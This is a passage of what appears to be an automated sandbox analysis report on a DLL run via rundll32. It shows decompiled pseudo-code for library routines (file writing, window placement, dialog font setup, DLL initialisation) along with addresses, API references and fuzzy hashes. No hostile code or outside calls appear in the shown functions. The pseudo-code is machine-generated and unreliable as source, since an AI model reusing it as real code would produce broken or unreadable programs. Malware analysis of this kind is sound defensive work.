                                                                        0x1000e688
                                                                        0x1000e697
                                                                        0x1000e69b
                                                                        0x1000e6a1
                                                                        0x1000e6ab
                                                                        0x1000e6ae
                                                                        0x1000e6b4
                                                                        0x1000e6b7
                                                                        0x1000e6bc
                                                                        0x1000e6c7
                                                                        0x1000e6d3
                                                                        0x1000e6d6
                                                                        0x1000e6dc
                                                                        0x1000e6df
                                                                        0x1000e6e4
                                                                        0x1000e6e6
                                                                        0x1000e6f4
                                                                        0x00000000
                                                                        0x1000e6f4
                                                                        0x1000e6be
                                                                        0x1000e6be
                                                                        0x1000e6be
                                                                        0x1000e6bc
                                                                        0x1000e629
                                                                        0x1000e629
                                                                        0x1000e62d
                                                                        0x1000e63d
                                                                        0x1000e640
                                                                        0x1000e642
                                                                        0x1000e642
                                                                        0x1000e64c
                                                                        0x1000e6f6
                                                                        0x1000e700
                                                                        0x1000e702
                                                                        0x1000e71c
                                                                        0x1000e725
                                                                        0x1000e725
                                                                        0x1000e72a
                                                                        0x1000e652
                                                                        0x1000e655
                                                                        0x1000e66f
                                                                        0x1000e678
                                                                        0x1000e678
                                                                        0x1000e67d
                                                                        0x1000e67d
                                                                        0x1000e64c
                                                                        0x1000e730

                                                                        APIs
                                                                        • IsWindowVisible.USER32 ref: 1000E5AD
                                                                        • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                        • GetWindowRect.USER32 ref: 1000E5D3
                                                                        • GetWindowRect.USER32 ref: 1000E5E0
                                                                          • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                          • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$DesktopMoveShowVisible
                                                                        • String ID:
                                                                        • API String ID: 3835705305-0
                                                                        • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                        • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100197AB Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0x1bfbe703
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}






















                                                                        0x100197ac
                                                                        0x100197b9
                                                                        0x100197bf
                                                                        0x100197c7
                                                                        0x100197cd
                                                                        0x100197d0
                                                                        0x100197d3
                                                                        0x100197f3
                                                                        0x100197fc
                                                                        0x100197ff
                                                                        0x10019804
                                                                        0x10019810
                                                                        0x10019815
                                                                        0x1001981a
                                                                        0x1001981c
                                                                        0x10019820
                                                                        0x10019906
                                                                        0x1001990c
                                                                        0x1001990e
                                                                        0x10019921
                                                                        0x10019910
                                                                        0x10019913
                                                                        0x10019916
                                                                        0x10019916
                                                                        0x10019826
                                                                        0x10019826
                                                                        0x10019832
                                                                        0x10019835
                                                                        0x10019838
                                                                        0x10019931
                                                                        0x10019931
                                                                        0x10019933
                                                                        0x10019938
                                                                        0x10019949
                                                                        0x1001994e
                                                                        0x10019954
                                                                        0x10019959
                                                                        0x1001995b
                                                                        0x1001995b
                                                                        0x10019963
                                                                        0x00000000
                                                                        0x10019964
                                                                        0x10019940
                                                                        0x10019943
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019945
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001983e
                                                                        0x1001983e
                                                                        0x10019841
                                                                        0x10019841
                                                                        0x10019847
                                                                        0x1001984a
                                                                        0x1001984d
                                                                        0x1001984d
                                                                        0x10019853
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019858
                                                                        0x1001985b
                                                                        0x1001985d
                                                                        0x1001985e
                                                                        0x10019861
                                                                        0x10019863
                                                                        0x10019866
                                                                        0x10019869
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986a
                                                                        0x1001986d
                                                                        0x1001986f
                                                                        0x10019870
                                                                        0x10019873
                                                                        0x10019873
                                                                        0x10019881
                                                                        0x10019893
                                                                        0x10019899
                                                                        0x1001989b
                                                                        0x100198c2
                                                                        0x100198c5
                                                                        0x100198c5
                                                                        0x100198c5
                                                                        0x100198c7
                                                                        0x100198c7
                                                                        0x100198ca
                                                                        0x100198cc
                                                                        0x10019960
                                                                        0x10019960
                                                                        0x00000000
                                                                        0x10019960
                                                                        0x100198d2
                                                                        0x100198d5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100198d9
                                                                        0x100198da
                                                                        0x100198dd
                                                                        0x10019929
                                                                        0x100198df
                                                                        0x100198e4
                                                                        0x100198ea
                                                                        0x100198ef
                                                                        0x100198ef
                                                                        0x00000000
                                                                        0x100198dd
                                                                        0x1001989d
                                                                        0x100198a0
                                                                        0x100198a3
                                                                        0x100198a5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100198b0
                                                                        0x100198b2
                                                                        0x100198b2
                                                                        0x100198ba
                                                                        0x00000000
                                                                        0x100197d5
                                                                        0x100197d5
                                                                        0x10019965
                                                                        0x10019978
                                                                        0x10019978

                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                        • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}


















                                                                        0x1003078e
                                                                        0x10030798
                                                                        0x100307a0
                                                                        0x100307a6
                                                                        0x100307a8
                                                                        0x100307b3
                                                                        0x100307b4
                                                                        0x100307d8
                                                                        0x100307d8
                                                                        0x100307e0
                                                                        0x100307e3
                                                                        0x100307e3
                                                                        0x100307e6
                                                                        0x100307e8
                                                                        0x100307ea
                                                                        0x100307ea
                                                                        0x100307f8
                                                                        0x10030809
                                                                        0x1003080f
                                                                        0x1003081e
                                                                        0x1003081f
                                                                        0x10030820
                                                                        0x10030821
                                                                        0x10030823
                                                                        0x1003088a
                                                                        0x10030899
                                                                        0x100308ae
                                                                        0x100308b0
                                                                        0x100308b8
                                                                        0x100308be
                                                                        0x100308be
                                                                        0x100308c1
                                                                        0x100308c7
                                                                        0x100308cd
                                                                        0x100308cd
                                                                        0x1003082a
                                                                        0x10030836
                                                                        0x10030845
                                                                        0x10030854
                                                                        0x1003085a
                                                                        0x1003085c
                                                                        0x10030864
                                                                        0x1003086d
                                                                        0x10030873
                                                                        0x10030879
                                                                        0x10030879
                                                                        0x1003085c
                                                                        0x100308d3
                                                                        0x100308dd
                                                                        0x100308e8
                                                                        0x100308e8
                                                                        0x100307b9
                                                                        0x100307d3
                                                                        0x100307d6
                                                                        0x100307dd
                                                                        0x100307dd
                                                                        0x100307dd
                                                                        0x00000000
                                                                        0x100307dd
                                                                        0x00000000
                                                                        0x100307bb
                                                                        0x100307c0
                                                                        0x100307c1
                                                                        0x100307c8
                                                                        0x100307c8
                                                                        0x100307c8
                                                                        0x100307c3
                                                                        0x100307c3
                                                                        0x100307c3
                                                                        0x100307ce
                                                                        0x00000000
                                                                        0x100307ce

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$IntersectWindow$Desktop
                                                                        • String ID:
                                                                        • API String ID: 123605412-0
                                                                        • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                        • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}





















                                                                        0x1002483e
                                                                        0x10024849
                                                                        0x1002484c
                                                                        0x1002484f
                                                                        0x10024862
                                                                        0x10024870
                                                                        0x10024878
                                                                        0x1002488d
                                                                        0x1002488f
                                                                        0x10024892
                                                                        0x1002489a
                                                                        0x10024894
                                                                        0x10024894
                                                                        0x10024894
                                                                        0x100248a9
                                                                        0x100248c9
                                                                        0x100248cc
                                                                        0x100248d2
                                                                        0x100248d7
                                                                        0x100248d9
                                                                        0x100248e5
                                                                        0x100248e5
                                                                        0x100248e9
                                                                        0x100248ec
                                                                        0x100248f0
                                                                        0x100248f4
                                                                        0x100248f7
                                                                        0x100248fe
                                                                        0x10024901
                                                                        0x10024909
                                                                        0x10024903
                                                                        0x10024903
                                                                        0x10024903
                                                                        0x10024910
                                                                        0x10024922
                                                                        0x10024927
                                                                        0x10024927
                                                                        0x10024931
                                                                        0x10024941
                                                                        0x10024946
                                                                        0x10024951
                                                                        0x10024954
                                                                        0x1002495a
                                                                        0x10024960
                                                                        0x100248ab
                                                                        0x100248ab
                                                                        0x100248ab
                                                                        0x10024851
                                                                        0x10024851
                                                                        0x10024851
                                                                        0x1002496d

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLocklstrlen
                                                                        • String ID:
                                                                        • API String ID: 1144527523-0
                                                                        • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                        • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}





















                                                                        0x1001119e
                                                                        0x100111a5
                                                                        0x1001128b
                                                                        0x1001128d
                                                                        0x100112bb
                                                                        0x100112be
                                                                        0x10011304
                                                                        0x10011307
                                                                        0x1001130b
                                                                        0x10011310
                                                                        0x10011311
                                                                        0x10011313
                                                                        0x10011313
                                                                        0x10011314
                                                                        0x10011319
                                                                        0x10011319
                                                                        0x100112c0
                                                                        0x100112c5
                                                                        0x100112cc
                                                                        0x100112ce
                                                                        0x100112d2
                                                                        0x10011300
                                                                        0x10011300
                                                                        0x00000000
                                                                        0x10011300
                                                                        0x100112e1
                                                                        0x100112e3
                                                                        0x100112e4
                                                                        0x100112fa
                                                                        0x00000000
                                                                        0x100112ff
                                                                        0x100112e6
                                                                        0x100112ec
                                                                        0x100112f2
                                                                        0x100112f6
                                                                        0x00000000
                                                                        0x100112f6
                                                                        0x1001128f
                                                                        0x10011295
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10011297
                                                                        0x1001129d
                                                                        0x100112a3
                                                                        0x100112a5
                                                                        0x100112a5
                                                                        0x100112aa
                                                                        0x100112af
                                                                        0x100112b4
                                                                        0x00000000
                                                                        0x100112b4
                                                                        0x100111b0
                                                                        0x100111b5
                                                                        0x100111b8
                                                                        0x100111c6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100111cc
                                                                        0x100111cf
                                                                        0x100111d5
                                                                        0x100111d8
                                                                        0x100111dd
                                                                        0x100111e0
                                                                        0x100111e9
                                                                        0x100111f2
                                                                        0x100111f8
                                                                        0x10011200
                                                                        0x10011200
                                                                        0x1001120d
                                                                        0x1001121a
                                                                        0x10011227
                                                                        0x10011233
                                                                        0x1001123e
                                                                        0x10011248
                                                                        0x1001124d
                                                                        0x10011252
                                                                        0x10011254
                                                                        0x10011284
                                                                        0x10011284
                                                                        0x00000000
                                                                        0x10011284
                                                                        0x10011256
                                                                        0x1001125b
                                                                        0x1001125d
                                                                        0x1001127f
